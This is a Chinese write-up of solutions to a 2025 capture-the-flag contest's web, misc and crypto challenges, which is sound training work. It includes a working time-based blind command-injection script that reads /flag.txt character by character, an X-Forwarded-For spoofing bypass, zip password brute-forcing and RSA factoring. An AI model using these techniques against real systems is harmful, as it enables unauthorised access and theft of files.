2025第九届御网杯WP

WEB

easyweb

写脚本枚举后台flag文件编写脚本运行,但是一开始跑出来了一半,右边}没跑出来乱码了,本以为只跑出来一半,就先存着了,最后再跑发现跑不出来了,一直显示网络问题。我就尝试自己加一个大括号,竟然成功了。最后想在跑一遍但还是乱码了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/env python3
import requests
def get_flag(addr, result=""):
    for x in range(1, 40):  # 假设flag长度为39字符(从1到39)
        for i in range(0x20, 0x7f):  # 可打印ASCII字符范围(32到126)
            if post(addr, x, chr(i)):
                result += chr(i)
                print(f"Current flag: {result}")  # 打印当前已破解的flag
                break  # 找到当前字符后跳出内层循环
    print(f"Final flag: {result}")  # 打印最终flag

def post(addr, pos, payload):
    data = {
        "cmd": f"[ $(cut -c {pos} /flag.txt 2>/dev/null) = '{payload}' ] && sleep 2"
    }
    try:
        requests.post(f"http://{addr}/", data, timeout=(3, 1))  # 设置超时为3秒
        return False  # 未触发超时,说明字符不匹配
    except requests.exceptions.ReadTimeout:
        return True  # 触发超时,说明字符匹配
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return False

if __name__ == '__main__':
    get_flag("Here IP:port")

YWB_Web_xff

题目内容,阅读源码,绕过IP限制获取flag

下载源码视检

点击展开源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>企业门户登录系统</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="background"></div>
    <div class="container">
        <div class="header">
            <h1>企业门户登录系统</h1>
            <p>欢迎使用企业门户系统</p>
        </div>
        <div class="content">
            <form class="login-form" method="post" action="">
                <div class="form-group">
                    <label for="username">用户名</label>
                    <input type="text" id="username" name="username" required>
                </div>
                <div class="form-group">
                    <label for="password">密码</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <button type="submit" class="login-btn">登录</button>
            </form>
            <?php
            if ($_SERVER["REQUEST_METHOD"] == "POST") {
                $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
                if ($cip == "2.2.2.1") {
                    echo '<div class="success">';
                    echo '<h2>登录成功!</h2>';
                    $flag = file_get_contents('/flag.txt');
                    echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
                    echo '</div>';
                } else {
                    echo '<div class="error">';
                    echo '<h2>登录失败</h2>';
                    echo '<p>IP地址验证失败</p>';
                    echo '<p>当前IP: ' . htmlspecialchars($cip) . '</p>';
                    echo '</div>';
                }
            }
            ?>
        </div>
        <div class="footer">
            <p>© 2024 企业门户系统 | 技术支持</p>
        </div>
    </div>
</body>
</html>

发现需要用POST请求和构造IP

利用burp suite抓包构造X_FORWARDED_FOR:2.2.2.1,成功获取flag

image-20250511195759774

MISC

光隙中的寄生密钥

获取png图片,用strings命令进行关键字枚举

image-20250511200332532

发现藏的有文件,用kali内置的foremost工具进行文件分离

image-20250511201902300

得到一个加密的压缩包

我们拿去用ARCHPR软件对zip进行密码爆破得到密码为9864

打开记事本将里面的字符串

5a6d78685a337333656b7368646a52534a546c59633042584d32556a66513d3d进行解码

**ZmxhZ3s3ekshdjRSJTlYc0BXM2UjfQ==**再继续解得到最终flag

image-20250511202122108

被折叠的显影图纸

获取压缩包发现xls文件

image-20250511202508670

打开需要密码

image-20250511202546430

但是和表格文件没有关系,这是道隐写题

老样子先扔kali用strings进行枚举

image-20250511202808891

没想到flag直接出来了

草甸方阵的密语

打开发现是类似flag的格式

1
k9qrfSl6{uOV78pW32iXQ}

在随波逐流工具中可以看到是栅栏编码

用脚本进行枚举,栅栏解码后再爆破凯撒加密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
def rail_fence_decrypt(ciphertext, rails):
    # 创建栅栏
    fence = [[] for _ in range(rails)]
    rail = 0
    direction = 1  # 1表示向下,-1表示向上

    for char in ciphertext:
        fence[rail].append(char)
        rail += direction
        if rail == rails - 1 or rail == 0:
            direction *= -1

    # 合并栅栏
    plaintext = []
    for rail in fence:
        plaintext.extend(rail)
    return ''.join(plaintext)

def caesar_decrypt(ciphertext, shift):
    plaintext = []
    for char in ciphertext:
        if char.isalpha():
            shifted = ord(char) - shift
            if char.islower():
                if shifted < ord('a'):
                    shifted += 26
                elif shifted > ord('z'):
                    shifted -= 26
            elif char.isupper():
                if shifted < ord('A'):
                    shifted += 26
                elif shifted > ord('Z'):
                    shifted -= 26
            plaintext.append(chr(shifted))
        else:
            plaintext.append(char)
    return ''.join(plaintext)

def brute_force_decrypt(ciphertext):
    # 尝试栅栏密码(轨道数从2到5)
    for rails in range(2, 6):
        rail_decrypted = rail_fence_decrypt(ciphertext, rails)
        # 尝试凯撒密码(移位从1到25)
        for shift in range(1, 26):
            caesar_decrypted = caesar_decrypt(rail_decrypted, shift)
            if 'flag' in caesar_decrypted.lower():
                print(f"栅栏轨道数: {rails}, 凯撒移位: {shift}")
                print(f"可能的结果: {caesar_decrypted}")

# 输入密文
ciphertext = "k9qrfSl6{uOV78pW32iXQ}"
brute_force_decrypt(ciphertext)

image-20250511204133861

获取到flag

如果爆破不出来,可以手动枚举栅栏然后观察凯撒偏移。

ez_xor

题目与内容应该是XOR加密题

已知条件为XOR加密(但密钥未知

编写脚本删除分隔符 ,遍历 0x000xff做 key

用python脚本获取到flag

1
2
3
4
5
6
7
cipher_hex = "5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-00-08-44"
cipher_bytes = bytes.fromhex(cipher_hex.replace('-', ''))  # 把十六进制字符串转为字节

for key in range(0x100):  # 遍历 0x00~0xff 做 key
    plain = bytes([b ^ key for b in cipher_bytes]).decode('ascii', errors='ignore')
    if 'flag' in plain or 'FLAG' in plain:  # 假设 flag 格式含这个词
        print(f"Key=0x{key:02x}: {plain}")

easy_misc

打开发现一堆十进制数字,拿到随波逐流进行解码,解完获得base64编码

image-20250511205622959

再把base64解码->base58解码->ROT获得flag

image-20250511205731342

套娃

打开压缩包得到一份txt文件

通过strings工具解析知道内容可能包含了其他文件

image-20250511205812247

通过foremost工具进行文件分离,然后得到了一个压缩包,打开压缩包获得.txt文件,内容也叫套娃.txt

通过题目给的提示“套娃”猜测可能文件内还包含了其他文件,继续进行foremost进行文件分离,这次分离出来一个docx文件,拷贝到宿主机上打开,修改字体颜色,获得flag

image-20250511211524531

另一种解法是一直改文件后缀名,改成zip然后一直解压也可以获得flag,最后会解出xml文件。flag就在这个文件里面

CRYPTO

签到题

获取到exe文件,用记事本打开获得base64编码,利用解码工具进行解码,获得flag

baby_rsa

编写python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from Crypto.Util.number import long_to_bytes
import gmpy2

N = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
e = 65537
c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063

# Step 1: Factorize N (since p ≈ q, we can use Fermat's factorization)
def fermat_factorization(N):
    a = gmpy2.isqrt(N) + 1
    b2 = a * a - N
    while not gmpy2.is_square(b2):
        a += 1
        b2 = a * a - N
    b = gmpy2.isqrt(b2)
    p = a + b
    q = a - b
    return int(p), int(q)

p, q = fermat_factorization(N)
print(f"p = {p}")
print(f"q = {q}")

# Step 2: Compute phi(N) and d
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)

# Step 3: Decrypt ciphertext
m = pow(c, d, N)
flag = long_to_bytes(m).decode()
print(f"Flag: {flag}")

Cry_rsa

编写脚本计算flag值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import math

def extended_gcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = extended_gcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        return None  # 模反元素不存在
    else:
        return x % m

# 给定的参数
p = 473398607161
q = 4511491
e = 19

# 计算n和phi(n)
n = p * q
phi_n = (p - 1) * (q - 1)

# 计算d
d = modinv(e, phi_n)

# 计算flag值
flag_value = d + 5

# 输出结果
print(f"d = {d}")
print(f"flag{{{flag_value}}}")

ez_base

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
Dear Friend ; Especially for you - this amazing announcement 
. This is a one time mailing there is no need to request 
removal if you won't want any more ! This mail is being 
sent in compliance with Senate bill 2316 , Title 1 
; Section 303 ! This is not a get rich scheme . Why 
work for somebody else when you can become rich in 
77 months . Have you ever noticed society seems to 
be moving faster and faster and more people than ever 
are surfing the web ! Well, now is your chance to capitalize 
on this ! We will help you turn your business into 
an E-BUSINESS and sell more . You can begin at absolutely 
no cost to you . But don't believe us . Ms Ames who 
resides in Indiana tried us and says "Now I'm rich, 
Rich, RICH" . We are licensed to operate in all states 
. If not for you then for your LOVED ONES - act now 
! Sign up a friend and you'll get a discount of 30% 
! Thank-you for your serious consideration of our offer 
. Dear Internet user ; Your email address has been 
submitted to us indicating your interest in our letter 
! This is a one time mailing there is no need to request 
removal if you won't want any more ! This mail is being 
sent in compliance with Senate bill 1620 , Title 8 
; Section 302 . THIS IS NOT MULTI-LEVEL MARKETING . 
Why work for somebody else when you can become rich 
inside 25 days . Have you ever noticed more people 
than ever are surfing the web and people will do almost 
anything to avoid mailing their bills ! Well, now is 
your chance to capitalize on this ! We will help you 
sell more plus process your orders within seconds . 
You can begin at absolutely no cost to you . But don't 
believe us . Prof Anderson of Hawaii tried us and says 
"Now I'm rich many more things are possible" ! We are 
a BBB member in good standing . Do not go to sleep 
without ordering ! Sign up a friend and your friend 
will be rich too . Thank-you for your serious consideration 
of our offer ! Dear Friend , You made the right decision 
when you signed up for our club ! If you no longer 
wish to receive our publications simply reply with 
a Subject: of "REMOVE" and you will immediately be 
removed from our mailing list ! This mail is being 
sent in compliance with Senate bill 2616 ; Title 5 
; Section 304 . THIS IS NOT MULTI-LEVEL MARKETING ! 
Why work for somebody else when you can become rich 
inside 53 weeks . Have you ever noticed people love 
convenience & nearly every commercial on television 
has a .com on in it ! Well, now is your chance to capitalize 
on this . We will help you increase customer response 
by 160% and deliver goods right to the customer's doorstep 
! You can begin at absolutely no cost to you ! But 
don't believe us . Mr Jones of California tried us 
and says "My only problem now is where to park all 
my cars" ! We are licensed to operate in all states 
. We implore you - act now ! Sign up a friend and you 
get half off . Thanks .

这题就是把信息加密成垃圾邮件的加密,直接拿去网站解密就行了
spammimic - decode

解密后再去base64解码flag就出来了